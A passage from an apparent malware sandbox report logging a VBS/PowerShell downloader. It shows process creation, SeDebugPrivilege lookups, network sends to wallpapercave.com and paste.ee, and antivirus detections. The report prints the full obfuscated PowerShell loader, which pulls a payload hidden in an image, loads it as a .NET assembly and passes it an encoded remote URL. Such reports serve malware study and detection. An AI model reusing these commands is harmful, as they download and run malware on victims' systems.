GIUSoxMagBlUSoxMGMUSoxMdUSoxMBbUSoxMF0USoxMXQUSoxMgUSoxMCgUSoxMJwBkUSoxMEgUSoxMaUSoxMUSoxMwUSoxMEwUSoxMbUSoxMBkUSoxMEYUSoxMUwB5USoxMDgUSoxMeUSoxMBMUSoxMHoUSoxMTQB3USoxME8USoxMVUSoxMBFUSoxMHYUSoxMTQBUUSoxMGsUSoxMdQBOUSoxMGkUSoxMNUSoxMUSoxM0USoxME8USoxMUwUSoxM0USoxMHgUSoxMTgBEUSoxMEUUSoxMdgBMUSoxMHoUSoxMcUSoxMB3USoxMGQUSoxMSUSoxMBSUSoxMG8USoxMJwUSoxMgUSoxMCwUSoxMIUSoxMUSoxMnUSoxMCcUSoxMIUSoxMUSoxMsUSoxMCUSoxMUSoxMJwUSoxMyUSoxMCcUSoxMIUSoxMUSoxMsUSoxMCUSoxMUSoxMJwByUSoxMGUUSoxMZwBhUSoxMHMUSoxMbQUSoxMnUSoxMCUSoxMUSoxMLUSoxMUSoxMgUSoxMCcUSoxMNQUSoxMnUSoxMCUSoxMUSoxMLUSoxMUSoxMgUSoxMCcUSoxMQwUSoxM6USoxMFwUSoxMVwBpUSoxMG4USoxMZUSoxMBvUSoxMHcUSoxMcwBcUSoxMFQUSoxMZQBtUSoxMHUSoxMUSoxMXUSoxMUSoxMnUSoxMCwUSoxMIUSoxMUSoxMnUSoxMGgUSoxMdUSoxMBtUSoxMGwUSoxMYwBlUSoxMG4USoxMdUSoxMBvUSoxMCcUSoxMKQUSoxMpUSoxMUSoxM==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('USoxM','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2920
thread_handle: 0x00000448
process_identifier: 2916
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LldFSy8xLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlcento'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000044c
1 1 0
Symantec ISB.Downloader!gen40
Kaspersky HEUR:Trojan.VBS.SAgent.gen
Varist VBS/Agent.BFC!Eldorado
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
Google Detected
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received 
Data received F
Data sent tpe?jƐÿ.ƒÆOGÓFç+yéêxå[Æî\“Ä©T„/5 ÀÀÀ À 28/ÿwallpapercave.com  
Data sent tpe?jÆ.—4.|”Ï+š•C¼Wÿ OÌ@z’_jëM/5 ÀÀÀ À 28/ÿwallpapercave.com  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: kge?jÂ$+ØS®«›´Ð´5*°™äU’Mž°ËK«/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 592
0 0

WSASend

 buffer: FBA‚ûìÀ^ìàvNB%•qËi%;źäjRý”BœYâ\qd†ßT”Eø6¿yÿ©àܑ׬d—$\U80ǚ„&4MÓÍ/¬û÷zêM\$á_ƒ`€ñ}^•X6žš$”|ö* `ˆ^º¾©
socket: 592
0 0

WSASend

 buffer: ÀyUÆ9å#J()ÕBwºŸXs)-J7-¼¯5X“}ø„…QÖyêйi'=ìhð(Ð?È«¥w6OÖhÜ.yЇìǐ°Y덴t¬—µãt_EmY³ÄôìV²kXO ЈÎï¦[”V;ÝV¹.s½‘â•»_Í)ۍ? tìÞÜ9Ê2–B€ŽdÔÔ?ó=ð¹d~†óß2Êz¬æmˆ>¶.v¡&œìï¦yß/†x¯·w3‰tɱYÈ
socket: 592
0 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: kge?jÂ$+ØS®«›´Ð´5*°™äU’Mž°ËK«/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 592
0 0

WSASend

 buffer: FBA‚ûìÀ^ìàvNB%•qËi%;źäjRý”BœYâ\qd†ßT”Eø6¿yÿ©àܑ׬d—$\U80ǚ„&4MÓÍ/¬û÷zêM\$á_ƒ`€ñ}^•X6žš$”|ö* `ˆ^º¾©
socket: 592
0 0

WSASend

 buffer: ÀyUÆ9å#J()ÕBwºŸXs)-J7-¼¯5X“}ø„…QÖyêйi'=ìhð(Ð?È«¥w6OÖhÜ.yЇìǐ°Y덴t¬—µãt_EmY³ÄôìV²kXO ЈÎï¦[”V;ÝV¹.s½‘â•»_Í)ۍ? tìÞÜ9Ê2–B€ŽdÔÔ?ó=ð¹d~†óß2Êz¬æmˆ>¶.v¡&œìï¦yß/†x¯·w3‰tɱYÈ
socket: 592
0 0

send

 buffer: tpe?jƐÿ.ƒÆOGÓFç+yéêxå[Æî\“Ä©T„/5 ÀÀÀ À 28/ÿwallpapercave.com  
socket: 1440
sent: 121
1 121 0

send

 buffer: tpe?jÆ.—4.|”Ï+š•C¼Wÿ OÌ@z’_jëM/5 ÀÀÀ À 28/ÿwallpapercave.com  
socket: 1440
sent: 121
1 121 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('USoxM','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('USoxM','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LldFSy8xLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 